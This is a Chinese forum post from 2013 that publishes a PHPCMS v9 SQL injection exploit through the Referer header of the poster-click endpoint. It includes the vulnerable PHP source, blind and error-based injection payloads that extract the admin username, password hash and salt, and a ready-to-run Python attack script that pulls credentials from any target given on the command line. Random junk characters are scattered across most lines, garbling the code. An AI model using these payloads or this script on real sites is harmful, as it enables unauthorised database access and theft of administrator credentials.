有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
1 A. s+ c; S* t$ \
; f( J" A* H( m0 |8 P问题函数\phpcms\modules\poster\index.php9 W; u& m& f" x4 d0 {
$ X- t& c; {2 i" t. S" _7 v
public function poster_click() {
t' [# o+ f$ X3 m: V5 i$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
) C# {7 J% w p! i% U$r = $this->db->get_one(array('id'=>$id));! v# h# w5 F: i7 h Y$ [; q
if (!is_array($r) && empty($r)) return false;/ p! b1 |; x) H* k
$ip_area = pc_base::load_sys_class('ip_area');1 u0 V% O& i Y1 l
$ip = ip();* T. X8 G: k: h7 p( T1 q/ X
$area = $ip_area->get($ip);
+ U+ l% N/ G' f, d4 R: J$username = param::get_cookie('username') ? param::get_cookie('username') : '';
b( k0 K" X+ i3 Q# pif($id) {
. b' @) S7 ?5 b# h* K$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();* J. z, z/ j) b/ [
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));1 `4 c, I) i- ?, x5 b
}5 |2 f! j# y4 C; D
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
# D* F( H7 N& N* l$setting = string2array($r['setting']);0 Z, L. Y8 ~2 B8 q! Y* ~' n
if (count($setting)==1) {
0 h( U. T- I" l( Y6 B4 H+ b$url = $setting['1']['linkurl'];
5 x9 l( H, S* P0 w$ M1 P$ b3 A9 W} else {
/ r; N8 F+ D8 V7 f$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
% {3 Z1 R7 R2 e1 z% n# S& ]}
' g6 V- }. O$ |$ O9 qheader('Location: '.$url);) E( Y4 X6 T# S6 ]% h
}$ Z0 t2 H$ j- l
) Z: ^! s; U8 m0 H& W
4 v$ g& h, X+ f3 N5 i
# ~# Q6 y5 v2 P0 e: ` _利用方式:
; k* s6 D4 F. x* C& I# e+ X4 ~( j
1、可以采用盲注入的手法:
+ H1 }3 J% v( O: r1 r- i; J, a: W2 H) H
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#; T% V! Y# p; \( g4 u
, f, w% V- r4 p- p* p2 Z
通过返回页面,正常与否一个个猜解密码字段。
3 q- F; m( V( k+ ^0 C, u0 F# v0 d* F: S* g" O: q+ _1 i7 E
2、代码是花开写的,随手附上了:2 S2 z8 w+ [0 S, }" i5 V
4 n+ f! R" P$ k9 X8 x% H
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
; I8 ?2 f8 ?5 w2 L
4 x2 N5 x) v U- G4 P4 W; d此方法是爆错注入手法,原理自查。; @! ^) w' e6 U
( u: F0 y, C) H8 B. q3 |" T6 U
2 Z" P: I/ X% f( s0 T- o+ i
# u. H: A: C! t' k. U利用程序:
5 E; g' H. a9 v T4 \, D% e" @) A! j3 d: {- V
#!/usr/bin/env python6 Y+ P- L) b1 b! m6 d( B9 |, h2 N
import httplib,sys,re' ^& [1 I/ T5 j2 l. K; W7 D
% O4 [7 T+ a0 @+ A6 Q
def attack():* _+ i: B; n1 d* W' a/ U, e
print “Code by Pax.Mac Team conqu3r!”6 a2 V* K l/ ]' o) z
print “Welcome to our zone!!!”( i6 s l# k% [5 U
url=sys.argv[1]
* |6 h- x( [* R% p9 E1 z* Fpaths=sys.argv[2]. z1 d; M6 q2 b, ? V7 d
conn = httplib.HTTPConnection(url)
0 ]% U8 d, F+ \6 g g) ki_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,+ M* X$ _; i; W ?
“Accept”: “text/plain”,
" k' ]. i) T5 y+ T/ ~' L6 u. S& x“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}/ i; J1 W- F2 |" ^( R* X
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)8 r2 s. d6 i& U5 E( @# I/ n3 Y
r1 = conn.getresponse()" S0 y1 W0 [8 L% x) T9 A
datas=r1.read()
7 a& R2 V3 d( G& q/ L. N0 Zdatas=re.findall(r”Duplicate entry \’\w+’”, datas)
% x, o) W9 T- n* Z/ Nprint datas[0]
; i. w- O. F, d9 c% U7 I1 |conn.close()$ u' z4 Y# Y/ j. v! c0 G
if __name__==”__main__”:
5 r' v9 H' D: [if len(sys.argv)<3:
/ e: j; ^1 ~" y2 f: g7 Y. s4 J# Vprint “Code by Pax.Mac Team conqu3r”) v9 C$ g* L0 R- ~5 k" a
print “Usgae:”
8 F8 T" p; f9 Q i# jprint “ phpcmsattack.py www.paxmac.org /”
; A8 e ]+ n9 U# { D% ? fprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”. M4 \3 Y1 j/ J: e. b+ i8 y3 g
sys.exit(1)
; d0 O; t( r+ |+ h- Q' Rattack()
! _7 ?1 [" f( a8 `6 M3 y3 c
$ T* H" w$ J: {# o1 |$ |, o |
发表于 2013-1-11 21:01:00
收藏
支持
反对